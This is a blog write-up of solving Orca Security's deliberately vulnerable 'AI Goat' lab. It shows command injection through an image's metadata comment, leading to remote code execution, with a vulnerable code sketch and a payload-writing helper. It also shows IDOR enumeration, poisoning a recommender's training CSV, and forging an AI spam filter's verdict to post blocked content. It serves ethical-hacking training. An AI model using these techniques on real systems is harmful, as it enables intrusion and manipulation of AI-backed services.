The AI Goat is a deliberately vulnerable AI architecture hosted on AWS. Created by Orca Security, it serves as a resource to train the next generation of ethical hackers. In this post, I will hack the Goat, discuss what I like about it, and suggest improvements to make it even better.

Contents

Background

Setup

Challenge 1: AI Supply Chain Attack

Challenge 2: Data Poisoning Attack

Challenge 3: Output Integrity Attack

What I Liked

What Could Be Improved?

Final Thoughts - The Future

Background

OWASP WebGoat is one of the first resources ethical hackers use to learn web application security, allowing them to practice exploiting common vulnerabilities. With the meteoric rise of generative AI applications, Orca Security decided to launch the AI Goat at DEF CON earlier this year.

As of October 2024, the AI Goat is vulnerable to 3 of the issues in the OWASP Machine Learning Security Top 10. It uses the following AWS architecture, leveraging modern technologies such as Terraform for quick deployment and SageMaker for AI functionality.

Setup

Before setting up, you need an AWS account and an AWS access key for a user with administrative privileges. For convenience, I recommend creating a new IAM user and attaching the AdministratorAccess AWS managed policy to it.

Anyone with moderate technical experience should be able to set this up without trouble. Bear in mind that deployment took me around 15 minutes.

Challenge 1: AI Supply Chain Attack

Scenario: Product search page allows image uploads to find similar products.

Goal: Exploit the product search functionality to read sensitive files on the hosted endpoint’s virtual machine.

I quickly identified an “Upload Photo” field and tried uploading a test image. I was expecting to see a list of similar products returned, but nothing appeared to happen.

Next, I proxied the web traffic through Burp Suite, a common penetration testing tool used to intercept and manipulate HTTP requests. I re-sent my previous request and saw the following message returned:

The error message seemed unusually verbose, so I visited the linked GitHub repo. Lo and behold, it contained the image processing source code!

Fortunately, I have experience with both file upload vulnerabilities and Python. This code reads the ‘comment’ metadata field from the uploaded image, then simply executes it as an OS command using subprocess.run!
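To make the flaw concrete, here is a minimal Python sketch of the vulnerable pattern. It is not the AI Goat's actual source: it assumes the payload sits in a JPEG COM (comment) segment, which is what ExifTool's -comment option writes for JPEG files, and that the command is run with shell=True. The function names extract_jpeg_comment and vulnerable_process_upload are hypothetical.

```python
import struct
import subprocess
from typing import Optional


def extract_jpeg_comment(data: bytes) -> Optional[str]:
    """Return the text of the first JPEG COM (0xFFFE) segment, or None."""
    if data[:2] != b"\xff\xd8":  # every JPEG starts with the SOI marker
        raise ValueError("not a JPEG file")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            break  # malformed stream: stop scanning
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or start-of-scan: no more header segments
            break
        # The segment length is big-endian and includes its own two bytes
        (length,) = struct.unpack(">H", data[pos + 2 : pos + 4])
        if marker == 0xFE:
            return data[pos + 4 : pos + 2 + length].decode("utf-8", errors="replace")
        pos += 2 + length
    return None


def vulnerable_process_upload(data: bytes) -> str:
    """DELIBERATELY UNSAFE: attacker-controlled metadata reaches a shell."""
    comment = extract_jpeg_comment(data)
    if comment is None:
        return ""
    # Whatever string the uploader stored in the comment runs as a shell command
    result = subprocess.run(comment, shell=True, capture_output=True, text=True)
    return result.stdout
```

The fix is to treat metadata strictly as data: never hand it to subprocess, and if a command genuinely must run, use a fixed argument list that contains no user input.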

I downloaded ExifTool, a handy utility for reading and writing file metadata, and ran the following command to insert “ls” as a comment into the image’s metadata:



exiftool -comment="ls" test.jpg

Then I uploaded the new image to the AI Goat. Sure enough, it executed ls and listed all the files in the server’s current directory:

This gave me full remote code execution (RCE) on the server, a hacker’s dream. I went on to use “cat” to print the contents of sensitive files.
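If you don't have ExifTool handy, a rough pure-Python stand-in for the exiftool command above is to insert a JPEG COM segment directly after the SOI marker. This is a sketch under that assumption: ExifTool may place the segment elsewhere in the file, and add_jpeg_comment and write_commented_copy are hypothetical helper names.

```python
import struct


def add_jpeg_comment(data: bytes, comment: str) -> bytes:
    """Insert a COM (0xFFFE) segment carrying `comment` right after SOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG file")
    payload = comment.encode("utf-8")
    if len(payload) > 0xFFFF - 2:
        raise ValueError("comment too long for a single COM segment")
    # The length field is big-endian and counts itself (2 bytes) plus the payload
    segment = b"\xff\xfe" + struct.pack(">H", len(payload) + 2) + payload
    return data[:2] + segment + data[2:]


def write_commented_copy(src: str, dst: str, comment: str) -> None:
    """Read a JPEG from `src` and write a copy with the comment to `dst`."""
    with open(src, "rb") as f:
        original = f.read()
    with open(dst, "wb") as f:
        f.write(add_jpeg_comment(original, comment))
```

For example, write_commented_copy("test.jpg", "payload.jpg", "ls") produces an image equivalent in spirit to the one uploaded above.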

Challenge 2: Data Poisoning Attack

Scenario: Custom product recommendations per user on the shopping cart page.

Goal: Manipulate the AI model to recommend the Orca stuffed toy.

I initially added the turtle and penguin to my cart, reasoning that other sea creatures might nudge the model toward the orca. To my dismay, the ‘suggested products’ had still not loaded after 5 minutes of waiting. I suspected an issue with SageMaker and proceeded to take matters into my own hands…

I noticed that each doll had an ID in the URL, ranging from 1 to 19. I tried requesting doll 0 and doll 20, but both GET requests returned 404s. After manual enumeration, I realized that none of the listed dolls used ID 2. I simply put 2 into the URL, and the Orca doll was returned.
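The manual enumeration above can be scripted. This is a minimal sketch, not a tool from the post: it finds IDs in a range that the public catalogue never shows, then probes them. The URL template passed to http_status (for example "http://your-lab-host/product/{id}") is a hypothetical placeholder, and the status fetcher is injected so the logic can be checked offline.

```python
import urllib.error
import urllib.request
from typing import Callable, Iterable, List


def find_unlisted_ids(listed: Iterable[int], low: int, high: int) -> List[int]:
    """IDs in [low, high] that never appear in the public product listing."""
    seen = set(listed)
    return [i for i in range(low, high + 1) if i not in seen]


def probe_ids(ids: Iterable[int], fetch_status: Callable[[int], int]) -> List[int]:
    """Return the IDs for which the server answers 200 rather than 404."""
    return [i for i in ids if fetch_status(i) == 200]


def http_status(url_template: str, product_id: int) -> int:
    """GET one product URL and return its HTTP status code."""
    url = url_template.format(id=product_id)
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 404 and friends arrive as exceptions in urllib
```

Against a live lab you would pass something like functools.partial(http_status, "http://your-lab-host/product/{id}") as fetch_status. With IDs 1 and 3 to 19 listed, the candidates in 0 to 20 are 0, 2 and 20, and only 2 answers with a product.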

This is an Insecure Direct Object Reference (IDOR) vulnerability, a classic web application security flaw. There was no need to attack the AI at all, because a far easier route exposed the hidden product, which defeats the purpose of this challenge.

According to the official solution, the intended route was to use the RCE access from Challenge 1 to find the name of a sensitive bucket, then upload a CSV file containing several high ratings for the Orca doll. If the ‘Suggested Products’ feature had worked, I might have found this on my own.
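To illustrate why flooding the training data works, here is a toy sketch. It does not reproduce the AI Goat's SageMaker model: it assumes a hypothetical user_id/product_id/rating CSV schema and a naive recommender that ranks products by total rating. The Orca doll's ID of 2 comes from the enumeration above; uploading the file to the bucket (for example with boto3's upload_file) is left out.

```python
import csv
import io
from collections import defaultdict
from typing import Dict, List, Tuple

# (user_id, product_id, rating): a hypothetical schema for illustration only
Rating = Tuple[str, int, float]


def top_product(ratings: List[Rating]) -> int:
    """Toy recommender: the product with the highest total rating wins."""
    totals: Dict[int, float] = defaultdict(float)
    for _user, product, score in ratings:
        totals[product] += score
    return max(totals, key=totals.get)


def poisoned_csv(target_product: int, n_rows: int, max_rating: float = 5.0) -> str:
    """Build a CSV of fake users all giving the target product top marks."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["user_id", "product_id", "rating"])
    for i in range(n_rows):
        writer.writerow([f"fake-user-{i}", target_product, max_rating])
    return buf.getvalue()


def parse_ratings(text: str) -> List[Rating]:
    """Parse the CSV back into rating tuples, as a training job might."""
    reader = csv.DictReader(io.StringIO(text))
    return [(r["user_id"], int(r["product_id"]), float(r["rating"])) for r in reader]
```

With a clean dataset where product 5 leads, appending parse_ratings(poisoned_csv(2, 3)) is enough to make top_product return 2. A real model needs more rows, but the principle is the same: whoever can write to the training data can steer the output.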

Challenge 3: Output Integrity Attack

Scenario: Content and spam filtering AI system for product page comments.

Goal: Bypass the filtering AI to post the forbidden comment “pwned” on the Orca stuffed toy product page.



I tried posting a comment, but unfortunately, the AI spam detection filter threw errors, preventing me from posting anything. Since I had RCE on the site, I downloaded the app.py file and examined the relevant code snippet:

The key point is that the data used by the ‘add_product_comment’ function comes from ‘request.get_json()’, in other words from the body of the user’s own request. The comment is passed to the AI filter, and the filter’s result is then placed into the JSON object sent in the user’s request, so the server trusts a verdict that the client controls.

The logic flaw? Users can manipulate their own requests! I simply set the offensive_value field to 1 and the comment to ‘pwned’. As mentioned, SageMaker kept throwing errors, so I couldn’t confirm that this worked.
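The trust problem can be shown in a few lines. This is a minimal sketch rather than the AI Goat's app.py: the handlers operate on an already-parsed JSON dict, and the verdict field name `blocked` and its true/false meaning are hypothetical placeholders (the real app carried its verdict in offensive_value, whose exact semantics I am not assuming here). The is_blocked callback stands in for the server-side AI filter.

```python
from typing import Callable, Dict, List


def vulnerable_add_comment(payload: Dict, comments: List[str]) -> bool:
    """UNSAFE: the filter's verdict arrives inside the client's own JSON."""
    if payload.get("blocked", True):  # hypothetical verdict field, client-controlled
        return False
    comments.append(payload["comment"])
    return True


def fixed_add_comment(
    payload: Dict, comments: List[str], is_blocked: Callable[[str], bool]
) -> bool:
    """Safer: ignore any client-supplied verdict and run the filter server-side."""
    comment = payload["comment"]
    if is_blocked(comment):
        return False
    comments.append(comment)
    return True
```

A forged body such as {"comment": "pwned", "blocked": False} sails through the first handler, while the second never reads the client's verdict. The general rule: any security decision must be computed on the server, never round-tripped through the client.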

What I Liked

The AI Goat is a good first attempt at providing a lab environment for AI red teamers:

Using Terraform and AWS made deployment easy and secure (albeit time-consuming to launch).

The UI is modern and looks fantastic.

The application has several complex functional components.

What Could Be Improved?

Fixing the SageMaker component - The SageMaker component didn’t work for me, even though Terraform reported no errors when building my lab. This should be investigated and fixed.

Making the AI Goat more AI-focused - The Goat felt more like a web application hacking lab at times, with AI tacked on as an afterthought!

Longer descriptions for each challenge - The instructions were unclear, leading me to accidentally do things I wasn’t meant to (e.g. viewing the source code for app.py).

Changing challenge 1 - Once you have RCE on a server, you can do nearly anything, which makes it easy to bypass the intended routes through the later challenges.

Final Thoughts - The Future

Overall, the AI Goat is a commendable effort at providing a resource for ethical hackers to hone their AI red teaming skills. While I would have liked to have seen more LLM-specific vulnerabilities like Indirect Prompt Injection, AI models are often tacked onto web applications as an afterthought, making web app hacking the primary skillset.

Completing this challenge changed the way I think about AI security: you don’t have to hack the AI model itself, because attacking the surrounding infrastructure can be enough. I hope to see further improvements made to the AI Goat, along with other organizations releasing similar challenges in the future.

Thanks for reading.